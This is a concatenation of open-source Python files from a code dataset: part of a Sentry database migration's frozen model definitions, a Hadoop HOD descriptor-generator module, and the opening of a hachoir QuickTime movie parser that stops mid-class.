('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'values_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.grouptagvalue': {
'Meta': {
'unique_together': "(('group', 'key', 'value'),)",
'object_name': 'GroupTagValue',
'db_table': "'sentry_messagefiltervalue'",
'index_together': "(('project', 'key', 'value', 'last_seen'),)"
},
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'grouptag'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'grouptag'",
'null': 'True',
'to': "orm['sentry.Project']"
}
),
'times_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'value': ('django.db.models.fields.CharField', [], {
'max_length': '200'
})
},
'sentry.lostpasswordhash': {
'Meta': {
'object_name': 'LostPasswordHash'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'unique': 'True'
}
)
},
'sentry.option': {
'Meta': {
'object_name': 'Option'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '64'
}),
'last_updated':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {
'object_name': 'Organization'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'default_role':
('django.db.models.fields.CharField', [], {
'default': "'member'",
'max_length': '32'
}),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '1'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'members': (
'django.db.models.fields.related.ManyToManyField', [], {
'related_name': "'org_memberships'",
'symmetrical': 'False',
'through': "orm['sentry.OrganizationMember']",
'to': "orm['sentry.User']"
}
),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'slug':
('django.db.models.fields.SlugField', [], {
'unique': 'True',
'max_length': '50'
}),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.organizationaccessrequest': {
'Meta': {
'unique_together': "(('team', 'member'),)",
'object_name': 'OrganizationAccessRequest'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'member': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.OrganizationMember']"
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.organizationmember': {
'Meta': {
'unique_together': "(('organization', 'user'), ('organization', 'email'))",
'object_name': 'OrganizationMember'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': (
'django.db.models.fields.EmailField', [], {
'max_length': '75',
'null': 'True',
'blank': 'True'
}
),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '0'
}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'member_set'",
'to': "orm['sentry.Organization']"
}
),
'role':
('django.db.models.fields.CharField', [], {
'default': "'member'",
'max_length': '32'
}),
'teams': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.Team']",
'symmetrical': 'False',
'through': "orm['sentry.OrganizationMemberTeam']",
'blank': 'True'
}
),
'token': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'unique': 'True',
'null': 'True',
'blank': 'True'
}
),
'type': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '50',
'blank': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'sentry_orgmember_set'",
'null': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.organizationmemberteam': {
'Meta': {
'unique_together': "(('team', 'organizationmember'),)",
'object_name': 'OrganizationMemberTeam',
'db_table': "'sentry_organizationmember_teams'"
},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'organizationmember': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.OrganizationMember']"
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.organizationonboardingtask': {
'Meta': {
'unique_together': "(('organization', 'task'),)",
'object_name': 'OrganizationOnboardingTask'
},
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_completed':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True'
}
)
},
'sentry.organizationoption': {
'Meta': {
'unique_together': "(('organization', 'key'),)",
'object_name': 'OrganizationOption',
'db_table': "'sentry_organizationoptions'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.project': {
'Meta': {
'unique_together': "(('team', 'slug'), ('organization', 'slug'))",
'object_name': 'Project'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'first_event': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'forced_color': (
'django.db.models.fields.CharField', [], {
'max_length': '6',
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '200'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'public': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'slug': ('django.db.models.fields.SlugField', [], {
'max_length': '50',
'null': 'True'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.projectbookmark': {
'Meta': {
'unique_together': "(('project_id', 'user'),)",
'object_name': 'ProjectBookmark'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.projectdsymfile': {
'Meta': {
'unique_together': "(('project', 'uuid'),)",
'object_name': 'ProjectDSymFile'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'uuid': ('django.db.models.fields.CharField', [], {
'max_length': '36'
})
},
'sentry.projectkey': {
'Meta': {
'object_name': 'ProjectKey'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'label': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'key_set'",
'to': "orm['sentry.Project']"
}
),
'public_key': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'unique': 'True',
'null': 'True'
}
),
'roles': ('django.db.models.fields.BigIntegerField', [], {
'default': '1'
}),
'secret_key': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'unique': 'True',
'null': 'True'
}
),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.projectoption': {
'Meta': {
'unique_together': "(('project', 'key'),)",
'object_name': 'ProjectOption',
'db_table': "'sentry_projectoptions'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.projectplatform': {
'Meta': {
'unique_together': "(('project_id', 'platform'),)",
'object_name': 'ProjectPlatform'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'platform': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.release': {
'Meta': {
'unique_together': "(('project', 'version'),)",
'object_name': 'Release'
},
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'date_released':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'blank': 'True'
}),
'date_started':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'blank': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'new_groups':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'owner': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True',
'blank': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'ref': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'url': (
'django.db.models.fields.URLField', [], {
'max_length': '200',
'null': 'True',
'blank': 'True'
}
),
'version': ('django.db.models.fields.CharField', [], {
'max_length': '64'
})
},
'sentry.releasecommit': {
'Meta': {
'unique_together': "(('release', 'commit'), ('release', 'order'))",
'object_name': 'ReleaseCommit'
},
'commit': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Commit']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
)
},
'sentry.releaseenvironment': {
'Meta': {
'unique_together': "(('project_id', 'release_id', 'environment_id'),)",
'object_name': 'ReleaseEnvironment',
'db_table': "'sentry_environmentrelease'"
},
'environment_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'first_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.releasefile': {
'Meta': {
'unique_together': "(('release', 'ident'),)",
'object_name': 'ReleaseFile'
},
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'name': ('django.db.models.fields.TextField', [], {}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
)
},
'sentry.repository': {
'Meta': {
'unique_together': "(('organization_id', 'name'),)",
'object_name': 'Repository'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '200'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.rule': {
'Meta': {
'object_name': 'Rule'
},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'label': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.savedsearch': {
'Meta': {
'unique_together': "(('project', 'name'),)",
'object_name': 'SavedSearch'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_default': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'query': ('django.db.models.fields.TextField', [], {})
},
'sentry.savedsearchuserdefault': {
'Meta': {
'unique_together': "(('project', 'user'),)",
'object_name': 'SavedSearchUserDefault',
'db_table': "'sentry_savedsearch_userdefault'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'savedsearch': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.SavedSearch']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.tagkey': {
'Meta': {
'unique_together': "(('project', 'key'),)",
'object_name': 'TagKey',
'db_table': "'sentry_filterkey'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'label':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'values_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.tagvalue': {
'Meta': {
'unique_together': "(('project', 'key', 'value'),)",
'object_name': 'TagValue',
'db_table': "'sentry_filtervalue'"
},
'data': (
'sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True',
'blank': 'True'
}
),
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'times_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'value': ('django.db.models.fields.CharField', [], {
'max_length': '200'
})
},
'sentry.team': {
'Meta': {
'unique_together': "(('organization', 'slug'),)",
'object_name': 'Team'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'slug': ('django.db.models.fields.SlugField', [], {
'max_length': '50'
}),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.user': {
'Meta': {
'object_name': 'User',
'db_table': "'auth_user'"
},
'date_joined':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email':
('django.db.models.fields.EmailField', [], {
'max_length': '75',
'blank': 'True'
}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'is_managed': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_password_expired':
('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_staff': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'last_login':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'last_password_change': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'name': (
'django.db.models.fields.CharField', [], {
'max_length': '200',
'db_column': "'first_name'",
'blank': 'True'
}
),
'password': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'session_nonce':
('django.db.models.fields.CharField', [], {
'max_length': '12',
'null': 'True'
}),
'username':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '128'
})
},
'sentry.useravatar': {
'Meta': {
'object_name': 'UserAvatar'
},
'avatar_type':
('django.db.models.fields.PositiveSmallIntegerField', [], {
'default': '0'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']",
'unique': 'True',
'null': 'True',
'on_delete': 'models.SET_NULL'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': (
'django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '32',
'db_index': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'avatar'",
'unique': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.useremail': {
'Meta': {
'unique_together': "(('user', 'email'),)",
'object_name': 'UserEmail'
},
'date_hash_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_verified': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'emails'",
'to': "orm['sentry.User']"
}
),
'validation_hash': (
'django.db.models.fields.CharField', [], {
'default': "u'o1Fm5V34FBi7vEcjC8i7yx1ycjcNaOCO'",
'max_length': '32'
}
)
},
'sentry.useroption': {
'Meta': {
'unique_together': "(('user', 'project', 'key'),)",
'object_name': 'UserOption'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.userreport': {
'Meta': {
'unique_together': "(('project', 'event_id'),)",
'object_name': 'UserReport',
'index_together': "(('project', 'event_id'), ('project', 'date_added'))"
},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'event_id': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
)
}
}
complete_apps = ['sentry']
| bsd-3-clause |
squidsolutions/hadoop-common | src/contrib/hod/hodlib/Common/descGenerator.py | 182 | 2306 | #Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
"""manage hod configuration"""
# -*- python -*-
import sys, csv, os
from optparse import Option, OptionParser
from xml.dom import minidom
from sets import Set
from select import select, poll, POLLIN
from hodlib.Common.desc import *
class DescGenerator:
"""Contains the conversion to descriptors and other method calls
to config"""
def __init__(self, hodConfig):
"""parse all the descriptors"""
self.hodConfig = hodConfig
def initializeDesc(self):
self.hodConfig['nodepooldesc'] = self.createNodePoolDesc()
self.hodConfig['servicedesc'] = self.createServiceDescDict()
return self.hodConfig
def getServices(self):
"""get all the services from the config"""
sdd = {}
for keys in self.hodConfig:
if keys.startswith('gridservice-'):
str = keys.split('-')
dict = self.hodConfig[keys]
if 'server-params' in dict: dict['attrs'] = dict['server-params']
if 'final-server-params' in dict: dict['final-attrs'] = dict['final-server-params']
dict['id'] = str[1]
desc = ServiceDesc(dict)
sdd[desc.getName()] = desc
return sdd
def createNodePoolDesc(self):
""" create a node pool descriptor and store
it in hodconfig"""
desc = NodePoolDesc(self.hodConfig['resource_manager'])
return desc
def createServiceDescDict(self):
"""create a service descriptor for
all the services and store it in the
hodconfig"""
sdd = self.getServices()
return sdd
| apache-2.0 |
austinvernsonger/metagoofil | hachoir_parser/video/mov.py | 16 | 36206 | """
Apple Quicktime Movie (file extension ".mov") parser.
Documents:
- Parsing and Writing QuickTime Files in Java (by Chris Adamson, 02/19/2003)
http://www.onjava.com/pub/a/onjava/2003/02/19/qt_file_format.html
- QuickTime File Format (official technical reference)
http://developer.apple.com/documentation/QuickTime/QTFF/qtff.pdf
- Apple QuickTime:
http://wiki.multimedia.cx/index.php?title=Apple_QuickTime
- File type (ftyp):
http://www.ftyps.com/
- MPEG4 standard
http://neuron2.net/library/avc/c041828_ISO_IEC_14496-12_2005%28E%29.pdf
Author: Victor Stinner, Robert Xiao
Creation: 2 august 2006
"""
from hachoir_parser import Parser
from hachoir_parser.common.win32 import GUID
from hachoir_core.field import (ParserError, FieldSet, MissingField,
Enum,
Bit, NullBits, Bits, UInt8, Int16, UInt16, Int32, UInt32, Int64, UInt64, TimestampMac32,
String, PascalString8, PascalString16, CString,
RawBytes, NullBytes, PaddingBytes)
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.text_handler import textHandler, hexadecimal
from hachoir_core.tools import MAC_TIMESTAMP_T0, timedelta
def timestampMac64(value):
if not isinstance(value, (float, int, long)):
raise TypeError("an integer or float is required")
return MAC_TIMESTAMP_T0 + timedelta(seconds=value)
from hachoir_core.field.timestamp import timestampFactory
TimestampMac64 = timestampFactory("TimestampMac64", timestampMac64, 64)
def fixedFloatFactory(name, int_bits, float_bits, doc):
size = int_bits + float_bits
class Float(FieldSet):
static_size = size
__doc__ = doc
def createFields(self):
yield Bits(self, "int_part", int_bits)
yield Bits(self, "float_part", float_bits)
def createValue(self):
return self["int_part"].value + float(self["float_part"].value) / (1<<float_bits)
klass = Float
klass.__name__ = name
return klass
QTFloat16 = fixedFloatFactory("QTFloat32", 8, 8, "8.8 fixed point number")
QTFloat32 = fixedFloatFactory("QTFloat32", 16, 16, "16.16 fixed point number")
QTFloat2_30 = fixedFloatFactory("QTFloat2_30", 2, 30, "2.30 fixed point number")
class AtomList(FieldSet):
def createFields(self):
while not self.eof:
yield Atom(self, "atom[]")
class TrackHeader(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version (0 or 1)")
yield NullBits(self, "flags", 20)
yield Bit(self, "is_in_poster")
yield Bit(self, "is_in_preview", "Is this track used when previewing the presentation?")
yield Bit(self, "is_in_movie", "Is this track used in the presentation?")
yield Bit(self, "is_enabled", "Is this track enabled?")
if self['version'].value == 0:
# 32-bit version
yield TimestampMac32(self, "creation_date", "Creation time of this track")
yield TimestampMac32(self, "lastmod_date", "Last modification time of this track")
yield UInt32(self, "track_id", "Unique nonzero identifier of this track within the presentation")
yield NullBytes(self, "reserved[]", 4)
yield UInt32(self, "duration", "Length of track, in movie time-units")
elif self['version'].value == 1:
# 64-bit version
yield TimestampMac64(self, "creation_date", "Creation time of this track")
yield TimestampMac64(self, "lastmod_date", "Last modification time of this track")
yield UInt32(self, "track_id", "Unique nonzero identifier of this track within the presentation")
yield NullBytes(self, "reserved[]", 4)
yield UInt64(self, "duration", "Length of track, in movie time-units")
yield NullBytes(self, "reserved[]", 8)
yield Int16(self, "video_layer", "Middle layer is 0; lower numbers are closer to the viewer")
yield Int16(self, "alternate_group", "Group ID that this track belongs to (0=no group)")
yield QTFloat16(self, "volume", "Track relative audio volume (1.0 = full)")
yield NullBytes(self, "reserved[]", 2)
yield QTFloat32(self, "geom_a", "Width scale")
yield QTFloat32(self, "geom_b", "Width rotate")
yield QTFloat2_30(self, "geom_u", "Width angle")
yield QTFloat32(self, "geom_c", "Height rotate")
yield QTFloat32(self, "geom_d", "Height scale")
yield QTFloat2_30(self, "geom_v", "Height angle")
yield QTFloat32(self, "geom_x", "Position X")
yield QTFloat32(self, "geom_y", "Position Y")
yield QTFloat2_30(self, "geom_w", "Divider scale")
yield QTFloat32(self, "frame_size_width")
yield QTFloat32(self, "frame_size_height")
class TrackReferenceType(FieldSet):
def createFields(self):
while not self.eof:
yield UInt32(self, "track_id[]", "Referenced track ID")
class Handler(FieldSet):
def createFields(self):
yield UInt8(self, "version", "Version")
yield NullBits(self, "flags", 24)
yield String(self, "creator", 4)
yield String(self, "subtype", 4)
